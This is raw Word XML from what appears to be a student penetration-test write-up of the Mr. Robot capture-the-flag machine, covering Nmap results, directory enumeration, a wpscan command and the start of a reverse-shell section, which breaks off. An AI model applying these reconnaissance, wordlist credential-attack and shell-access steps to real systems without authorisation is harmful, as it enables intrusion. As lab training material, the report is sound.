        <w:ind w:left="420" w:leftChars="0" w:hanging="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Apply least-privilege principles and regularly audit privilege escalation paths</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C12A920">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16F7B26C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66B7D682">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>4. Evidence &amp; Screenshots</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E4060B3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48A318B6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>This section contains visual proof of the exploitation steps and key milestones.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="100B0305">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>lear screenshots that demonstrate each step of exploitation. Each screenshot must include a short explanation of what it proves and why it is important.”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AA44039">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37EE7C6E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:ind w:left="420" w:leftChars="0" w:hanging="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Figure 1 – Nmap Scan Results</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03E50012">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1"/>
        <w:ind w:left="0" w:right="0"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Description</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 xml:space="preserve">Shows open ports and services discovered on the target host. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57B23F5A">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1"/>
        <w:ind w:left="0" w:right="0"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Explanation (What it proves):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="283A0D7D">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This screenshot shows the Nmap scan results identifying open ports on the Mr. Robot target machine. The scan reveals that ports</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 22,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> 80 and 443 are open, confirming that the web server is accessible and hosting the vulnerable WordPress site used later in the attack chain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40B8B6A4">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1"/>
        <w:ind w:left="0" w:right="0"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Why it is important:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DFAADAF">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These results provide the initial attack surface. Knowing which services are exposed allows the attacker to focus on the web application as the primary entry point. Without this information, the attacker would not know where to begin reconnaissance or which services might be exploitable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12B163A0">
      <w:pPr>
        <w:ind w:firstLine="105" w:firstLineChars="50"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Figure 1 – Nmap Scan Results</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>image</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F087A1B">
      <w:pPr>
        <w:ind w:firstLine="100" w:firstLineChars="50"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5265420" cy="2855595"/>
            <wp:effectExtent l="0" t="0" r="508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2"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5265420" cy="2855595"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="096F528C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41B9D513">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:ind w:left="420" w:leftChars="0" w:hanging="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Figure 2 – Directory Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C8366CA">
      <w:pPr>
        <w:ind w:firstLine="105" w:firstLineChars="50"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Description</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Demonstrates discovery of hidden directories and sensitive files</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> or directory enumeration revealing hidden web paths</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08A52DCF">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1"/>
        <w:ind w:left="0" w:right="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Explanation (What it proves):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58475EF6">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This screenshot shows the results of a directory enumeration scan against the Mr. Robot target machine. The scan identifies accessible directories such as /admin, /wp-content, and /robots, confirming that the web server exposes multiple paths that are not linked from the main site.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D1505EA">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1"/>
        <w:ind w:left="0" w:right="0"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Why it is important:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B2E6FA9">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1"/>
        <w:ind w:left="0" w:right="0"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>These discovered directories provide critical entry points for further exploitation. For example, /robot</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.txt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> leads to the fsocity.dic wordlist </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">that was clean using “sort” </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>used later for credential attacks,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> /wp-admin reveal the login page</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> and /wp-content reveals the structure of the WordPress installation. Without this enumeration step, the attacker would miss key components required to progress through the challenge.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27DDC174">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Figure 2 – Directory Enumeration</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>image</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F629956">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4AAD10B5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Used script: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>wpscan --url http://10.48.152.10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FE925BE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5265420" cy="2855595"/>
            <wp:effectExtent l="0" t="0" r="5080" b="190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3"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5265420" cy="2855595"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="04D1CD0C">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5265420" cy="2855595"/>
            <wp:effectExtent l="0" t="0" r="5080" b="190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4"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5265420" cy="2855595"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CC47855"/>
    <w:p w14:paraId="146402E0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5265420" cy="2855595"/>
            <wp:effectExtent l="0" t="0" r="5080" b="190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6"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5265420" cy="2855595"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="728A25CC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25E4146F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="189E1328">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:ind w:left="420" w:leftChars="0" w:hanging="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Figure 3 – Initial Shell Access</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/Reverse Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="505F87CD">
      <w:pPr>
        <w:ind w:firstLine="105" w:firstLineChars="50"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Description</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">: Confirms successful remote command execution as a low-privileged user. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18B611DD">
      <w:pPr>
        <w:ind w:firstLine="105" w:firstLineChars="50"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Explanation (What it proves):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="241B1B34">
      <w:pPr>
        <w:ind w:firstLine="105" w:firstLineChars="50"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F1F740D">
      <w:pPr>
        <w:ind w:firstLine="105" w:firstLineChars="50"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">This screenshot shows the attacker receiving a reverse shell from the Mr. Robot target machine. The terminal displays the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>host-name</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
